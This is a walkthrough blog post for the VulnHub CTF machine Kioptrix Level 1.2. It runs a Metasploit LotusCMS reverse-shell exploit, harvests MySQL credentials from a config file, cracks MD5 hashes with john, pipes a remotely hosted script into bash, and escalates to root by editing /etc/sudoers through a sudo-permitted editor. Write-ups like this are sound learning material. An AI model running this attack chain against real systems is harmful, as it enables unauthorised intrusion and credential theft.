Name : Kioptrix Level 1.2 (Level 3) Difficulty : Beginner Type : boot2root Source : VulnHub URL : https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ Entry : 5 / 30

Welcome to the walkthrough for Kioptrix Level 1.2 (#3), a boot2root CTF found on VulnHub. This is the fifth VM in my VulnHub Challenge! This is also the third VM in a family of CTF challenges on VulnHub called Kioptrix. This series is considered a great starting point for CTFs in the boot2root family. The naming convention is a bit weird, but they’re still fun to do.

Goal

For this particular entry in the series, there is a legitimate flag that we can read once we gain access to root .

Setup

I’m using VMWare Workstation Player to host Kali and the Kioptrix Level 1.2 (#3) image, with both VMs running in a bridged network since a NAT network isn’t working on VMWare.

Discovery

I use netdiscover to search for the IP address of the Kioptrix Level 1.2 (#3) VM:

root@dante:~# netdiscover -r 192.168.86.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.86.1 70:3a:cb:43:5b:26 1 60 Google, Inc. 192.168.86.21 00:0c:29:5e:e9:38 1 60 VMware, Inc. 192.168.86.29 70:3a:cb:43:5a:ce 1 60 Google, Inc. 192.168.86.32 70:3a:cb:3b:5c:fa 1 60 Google, Inc.

So it looks like 192.168.86.21 is our target.

Scanning

I’ll start with a quick nmap scan to look for open ports, then do a deeper dive into the services behind the open ports using the -sC and -sV flags:

root@dante:~# nmap 192.168.86.21 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-16 19:27 EDT Nmap scan report for 192.168.86.21 Host is up (0.0032s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:5E:E9:38 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds root@dante:~# nmap -sC -sV -p22,80 192.168.86.21 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-16 19:28 EDT Nmap scan report for 192.168.86.21 Host is up (0.00066s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Ligoat Security - Got Goat? Security ... MAC Address: 00:0C:29:5E:E9:38 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds

So not much in terms of ports, but the website is something I’m interested in exploring.

Web Reconnaissance

Let’s browse to the site and see what pops up:

So a pretty generic page with a few links. I do click through those links and see what I can find. There are a few interesting things on the Blog link:

We can see that the Gallery post mentions the website kioptrix3.com , so I’ll edit my /etc/hosts file on my Kali machine to match. Also, the last post mentions a new developer named loneferret , so that may also come in handy later.

Moving on to the Login page, we see some other interesting tidbits:

A login page, but this one is powered by LotusCMS. Interesting, this is definitely useful. I do try some basic SQL Injection attacks on the login page using the admin and loneferret users, but no luck. No problem, I’ll continue my web reconnaissance using gobuster :

root@dante:~# gobuster dir -f -x php -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.86.21 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.86.21 [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php [+] Add Slash: true [+] Timeout: 10s =============================================================== 2019/08/16 20:02:07 Starting gobuster =============================================================== /icons/ (Status: 200) /modules/ (Status: 200) /data/ (Status: 403) /index.php (Status: 200) /core/ (Status: 200) /update.php (Status: 200) /style/ (Status: 200) /cache/ (Status: 200) /phpmyadmin/ (Status: 200) /server-status/ (Status: 403) =============================================================== 2019/08/16 20:02:36 Finished ===============================================================

Ah, so there are two interesting findings here, namely update.php and /phpmyadmin/ . Before I go diving too deeply into those, I want to read up on LotusCMS a bit.

Looking For Vulnerabilities

Now that we know what type of CMS is being used on Kioptrix 1.2 (Level 3), let’s see if searchsploit can offer any insights:

root@dante:~# searchsploit lotuscms ---------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ---------------------------------------------------------------- ---------------------------------------- LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | exploits/php/remote/18565.rb LotusCMS 3.0.3 - Multiple Vulnerabilities | exploits/php/webapps/16982.txt ---------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result

Oh wow, we have a Metasploit module?! That’s gold Jerry! My only concern is that the exploit is for version 3.0 of LotusCMS, and I don’t know what version is currently running on this server.

Many Minutes Later

After a bunch of Googling, I found the original Sourceforge download site for LotusCMS releases here. By the looks of things, version 3.0.1 came out in September 2010, but the blog posts we have are from August 2010, so we may just be lucky enough to be running LotusCMS 3.0! Let me spin up Metasploit and we’ll see how this pans out.

Metasploit

Let me load up the Metasploit console, search for LotusCMS, and load up the exploit module:

root@dante:~# msfconsole MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM MMMMMMMMMMM MMMMMMMMMM MMMN$ vMMMM MMMNl MMMMM MMMMM JMMMM MMMNl MMMMMMMN NMMMMMMM JMMMM MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMMM MMMMMMM MMMMM jMMMM MMMNI MMMNM MMMMMMM MMMMM jMMMM MMMNI WMMMM MMMMMMM MMMM# JMMMM MMMMR ?MMNM MMMMM .dMMMM MMMMNm `?MMM MMMM` dMMMMM MMMMMMN ?MM MM? NMMMMMN MMMMMMMMNe JMMMMMNMMM MMMMMMMMMMNm, eMMMMMNMMNMM MMMMNNMNMMMMMNx MMMMMMNMMNMMNM MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM https://metasploit.com =[ metasploit v5.0.38-dev ] + -- --=[ 1912 exploits - 1073 auxiliary - 329 post ] + -- --=[ 545 payloads - 45 encoders - 10 nops ] + -- --=[ 3 evasion ] msf5 > search lotuscms Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/lcms_php_exec 2011-03-03 excellent Yes LotusCMS 3.0 eval() Remote Command Execution msf5 > use exploit/multi/http/lcms_php_exec msf5 exploit(multi/http/lcms_php_exec) > set payload generic/shell_reverse_tcp payload => generic/shell_reverse_tcp msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.86.21 RHOSTS => 192.168.86.21 msf5 exploit(multi/http/lcms_php_exec) > set LHOST 192.168.86.35 LHOST => 192.168.86.35 msf5 exploit(multi/http/lcms_php_exec) > set LPORT 9001 LPORT => 9001 msf5 exploit(multi/http/lcms_php_exec) > set URI / URI => / msf5 exploit(multi/http/lcms_php_exec) > show options Module options (exploit/multi/http/lcms_php_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.86.21 yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections URI / yes URI VHOST no HTTP server virtual host Payload options (generic/shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.86.35 yes The listen address (an interface may be specified) LPORT 9001 yes The listen port Exploit target: Id Name -- ---- 0 Automatic LotusCMS 3.0 msf5 exploit(multi/http/lcms_php_exec) > exploit [*] Started reverse TCP handler on 192.168.86.35:9001 [*] Using found page param: /index.php?page=index [*] Sending exploit ... [*] Command shell session 2 opened (192.168.86.35:9001 -> 192.168.86.21:45874) at 2019-08-16 20:28:49 -0400 whoami www-data python -c "import pty;pty.spawn('/bin/bash')" www-data@Kioptrix3:/home/www/kioptrix3.com$

For the options, I had actually figured these out earlier and just re-used the values. Trying to keep these write-ups brief, so I don’t include all the trial-and-error I go through for finding the right payload, etc. Things to watch out for would be to use the generic/shell_reverse_tcp payload, and be sure to change the default value for the URI option.

With that out of the way, I have a solid shell and now I can start poking around. I used a small Python trick to get myself a useful shell, but aside from that the connection is pretty basic.

Finding Credentials

Before I go too crazy, I’d like to see if I can find anything useful within the PHP files, such as passwords, etc. I’ll start by looking for a file with the name like *config.php :

www-data@Kioptrix3:/home/www/kioptrix3.com$ find . -name "*config.php" find . -name "*config.php" ./gallery/gconfig.php www-data@Kioptrix3:/home/www/kioptrix3.com$ cat ./gallery/gconfig.php cat ./gallery/gconfig.php <?php error_reporting(0); /* A sample Gallarific configuration file. You should edit the installer details below and save this file as gconfig.php Do not modify anything else if you don't know what it is. */ // Installer Details ----------------------------------------------- // Enter the full HTTP path to your Gallarific folder below, // such as http://www.yoursite.com/gallery // Do NOT include a trailing forward slash $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery"; $GLOBALS["gallarific_mysql_server"] = "localhost"; $GLOBALS["gallarific_mysql_database"] = "gallery"; $GLOBALS["gallarific_mysql_username"] = "root"; $GLOBALS["gallarific_mysql_password"] = "fuckeyou"; // Setting Details ------------------------------------------------- if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username$], $GLOBALS["gallarific_mysql_password"])) { echo("A connection to the database couldn't be established: " . mysql_error()); die(); }else { if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) { echo("The Gallarific database couldn't be opened: " . mysql_error()); die(); }else { $settings=mysql_query("select * from gallarific_settings"); if(mysql_num_rows($settings)!=0){ while($data=mysql_fetch_array($settings)){ $GLOBALS["{$data['settings_name']}"]=$data['settings_value']; } } } } ?>

Jackpot, we have the password for root on the MySQL server running on our target machine! Now let me go back to the /phpmyadmin/ site and see what mischief I can get into with this information.

Note: If you’re wondering why I didn’t run LinEnum.sh at this point, the main reason is that I knew I had a URL for phpMyAdmin that I haven’t looked at. I suspected I’d find some MySQL credentials somewhere in a configuration file, so I thought that might be an easier approach to start. This is just experience more than anything - there would be no harm in running LinEnum.sh at this stage.

phpMyAdmin

Logging in to http://192.168.86.21/phpmyadmin/ with the username/password combination of root / fuckeyou , we get a nice console:

Browsing through the phpMyAdmin console, I go to the gallery database, then notice there is a dev_accounts table. Browsing that table, I get some usernames and passwords:

So we have usernames and passwords that appear to be hashed. Since these are not part of the LotusCMS system or the Gallarific gallery system (based on the other table names in this database), I’m not sure what type of hash they are. Let me use the tool hashid on Kali to see if it can give me a guess:

root@dante:~# hashid 0d3eccfb887aabd50f243b3f155c0f85 Analyzing '0d3eccfb887aabd50f243b3f155c0f85' [+] MD2 [+] MD5 [+] MD4 [+] Double MD5 [+] LM [+] RIPEMD-128 [+] Haval-128 [+] Tiger-128 [+] Skein-256(128) [+] Skein-512(128) [+] Lotus Notes/Domino 5 [+] Skype [+] Snefru-128 [+] NTLM [+] Domain Cached Credentials [+] Domain Cached Credentials 2 [+] DNSSEC(NSEC3) [+] RAdmin v2.x root@dante:~# echo -n 0d3eccfb887aabd50f243b3f155c0f85 | wc -c 32

Okay, so the hash is 32 characters long, and one of the top results is MD5. I’m going to go out on a limb here and call it an MD5 hash.

Cracking Hashes with john

I’ll copy these hashes to a file called, appropriately, hashes.txt and then use john with the /usr/share/wordlists/rockyou.txt wordlist to try and crack the hashes:

root@dante:~# cat hashes.txt dreg:0d3eccfb887aabd50f243b3f155c0f85 loneferret:5badcaf789d3d1d09794d8f021f40f0e root@dante:~# john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hashes.txt Using default input encoding: UTF-8 Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider --fork=2 Press 'q' or Ctrl-C to abort, almost any other key for status starwars (loneferret) Mast3r (dreg) 2g 0:00:00:00 DONE (2019-08-16 20:56) 4.000g/s 21667Kp/s 21667Kc/s 21669KC/s Maswhit002..MashPt34 Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed

SSH For Fun and Profit

Remember that shell I opened with the Metasploit exploit? Well, I went back and saw that we had a few users in the /etc/passwd file:

www-data@Kioptrix3:/home/www/kioptrix3.com$ cat /etc/passwd cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

Looks like the dreg users uses an rbash shell, which is a restricted shell, but loneferret has a generic bash shell. Why make life harder for myself? I’ll try SSHing into the target as loneferret with the starwars password I found earlier.

root@dante:~# ssh loneferret@192.168.86.21 The authenticity of host '192.168.86.21 (192.168.86.21)' can't be established. RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.86.21' (RSA) to the list of known hosts. loneferret@192.168.86.21's password: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106 loneferret@Kioptrix3:~$

Success! Now that I have a stable shell, it may be time to do some further enumeration.

Enumeration with LinEnum.sh

When it comes to Linux machines, I love to use LinEnum.sh to do it. There are others out there, but this is my go-to script.

Note: I’ve updated my LinEnum.sh script to force the thorough tests option to always run. For CTFs, I always want the extra output so by forcing it within the script I don’t have to worry about forgetting to set the flag. This makes John a happy man.

I’ll start by hosting the script on my Kali machine using Python’s SimpleHTTPServer :

root@dante:/opt/LinEnum# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...

Next, I’ll go to my SSH session and download the script using wget , then port it to bash and review the output:

loneferret@Kioptrix3:~$ wget -qO - http://192.168.86.35/LinEnum.sh | bash ######################################################### # Local Linux Enumeration & Privilege Escalation Script # #########################################################/ # www.rebootuser.com # version 0.97 [-] Debug Info [+] Thorough tests = Enabled Scan started at: Fri Aug 16 17:46:40 EDT 2019 ### SYSTEM ############################################## [-] Kernel information: Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux [-] Kernel information (continued): Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009 [-] Specific release information: DISTRIB_ID=Ubuntu DISTRIB_RELEASE=8.04 DISTRIB_CODENAME=hardy DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS" [-] Hostname: Kioptrix3 <snip>

There’s a lot of output for this script, but I’m going to focus on a few key sections:

<snip> [+] We can sudo without supplying a password! usage: sudo -h | -K | -k | -L | -l | -V | -v usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value] {-i | -s | <command>} usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ... [-] Accounts that have recently used sudo: /home/loneferret/.sudo_as_admin_successful <snip> -] SUID files: -rwsr-xr-x 1 root root 4588 2008-08-22 19:10 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 168340 2008-05-14 10:35 /usr/lib/openssh/ssh-keysign -rwsr-xr-- 1 root www-data 10276 2009-06-18 04:53 /usr/lib/apache2/suexec -rwsr-xr-x 1 root root 9624 2011-01-11 02:12 /usr/lib/pt_chown -rwsr-xr-x 1 root root 11048 2007-12-10 12:33 /usr/bin/arping -rwsr-xr-x 1 root root 46084 2008-03-31 00:32 /usr/bin/mtr -rwsr-xr-x 1 root root 19144 2008-12-08 04:14 /usr/bin/newgrp -rwsr-xr-x 1 root root 28624 2008-12-08 04:14 /usr/bin/chfn -rwsr-xr-x 1 root root 37360 2008-12-08 04:14 /usr/bin/gpasswd -rwsr-xr-x 2 root root 107936 2009-02-16 22:17 /usr/bin/sudo -rwsr-sr-x 1 daemon daemon 38464 2007-02-20 08:41 /usr/bin/at -rwsr-xr-x 2 root root 107936 2009-02-16 22:17 /usr/bin/sudoedit -rwsr-xr-x 1 root root 23952 2008-12-08 04:14 /usr/bin/chsh -rwsr-xr-x 1 root root 29104 2008-12-08 04:14 /usr/bin/passwd -rwsr-xr-x 1 root root 12296 2007-12-10 12:33 /usr/bin/traceroute6.iputils -rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht -rwsr-xr-- 1 root dip 269256 2007-10-04 15:57 /usr/sbin/pppd -rwsr-sr-x 1 libuuid libuuid 12336 2008-03-27 13:25 /usr/sbin/uuidd -rwsr-xr-- 1 root dhcp 2960 2008-04-02 09:38 /lib/dhcp3-client/call-dhclient-script -rwsr-xr-- 1 root fuse 20056 2008-02-26 13:25 /bin/fusermount -rwsr-xr-x 1 root root 30856 2007-12-10 12:33 /bin/ping -rwsr-xr-x 1 root root 81368 2008-09-26 08:43 /bin/mount -rwsr-xr-x 1 root root 63584 2008-09-26 08:43 /bin/umount -rwsr-xr-x 1 root root 26684 2007-12-10 12:33 /bin/ping6 -rwsr-xr-x 1 root root 25540 2008-12-08 04:14 /bin/su <snip>

The first thing I want to do is see exactly what I can run using sudo as the loneferret user:

loneferret@Kioptrix3:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: !/usr/bin/su (root) NOPASSWD: /usr/local/bin/ht loneferret@Kioptrix3:~$ which su /bin/su loneferret@Kioptrix3:~$

Cool, so the /usr/local/bin/ht executable (which also happens to have the SUID bit set) is something I can run with sudo without a password. It’s a pity that the entry for su is wrong. Oh well, let me explore this /usr/local/bin/ht application and see what it does:

Well, well, well! Looks like we have an editor!

Escalating Privileges

The editor seems to be very similar to a nano , but with colour! I’ll see if I can open the /etc/sudoers file and “correct” the mistake for the su entry so that it has a valid path (it should be /bin/su ). I press F3 to open up a file, and type in /etc/sudoers for the path to the file to open, then hit enter:

Next, I make the necessary changes for the loneferret user, save the file with F2 and then use CTRL-c to exit the editor:

With the editing out of the way, I do a quick check to make sure my configurations work, and I escalate to root:

loneferret@Kioptrix3:~$ sudo -l User loneferret may run the following commands on this host: (root) NOPASSWD: /bin/su (root) NOPASSWD: /usr/local/bin/ht loneferret@Kioptrix3:~$ sudo su - root@Kioptrix3:~# whoami root root@Kioptrix3:~# pwd /root root@Kioptrix3:~#

Retrieve The Flag

Now that I’m in as root , it’s just a quick check to see if the flag is in the /root directory, then retrieve the contents of it.

root@Kioptrix3:~# ls Congrats.txt ht-2.0.18 root@Kioptrix3:~# cat Congrats.txt Good for you for getting here. Regardless of the matter (staying within the spirit of the game of course) you got here, congratulations are in order. Wasn't that bad now was it. Went in a different direction with this VM. Exploit based challenges are nice. Helps workout that information gathering part, but sometimes we need to get our hands dirty in other things as well. Again, these VMs are beginner and not intented for everyone. Difficulty is relative, keep that in mind. The object is to learn, do some research and have a little (legal) fun in the process. I hope you enjoyed this third challenge. Steven McElrea aka loneferret http://www.kioptrix.com Credit needs to be given to the creators of the gallery webapp and CMS used for the building of the Kioptrix VM3 site. Main page CMS: http://www.lotuscms.org Gallery application: Gallarific 2.1 - Free Version released October 10, 2009 http://www.gallarific.com Vulnerable version of this application can be downloaded from the Exploit-DB website: http://www.exploit-db.com/exploits/15891/ The HT Editor can be found here: http://hte.sourceforge.net/downloads.html And the vulnerable version on Exploit-DB here: http://www.exploit-db.com/exploits/17083/ Also, all pictures were taken from Google Images, so being part of the public domain I used them.

Fin.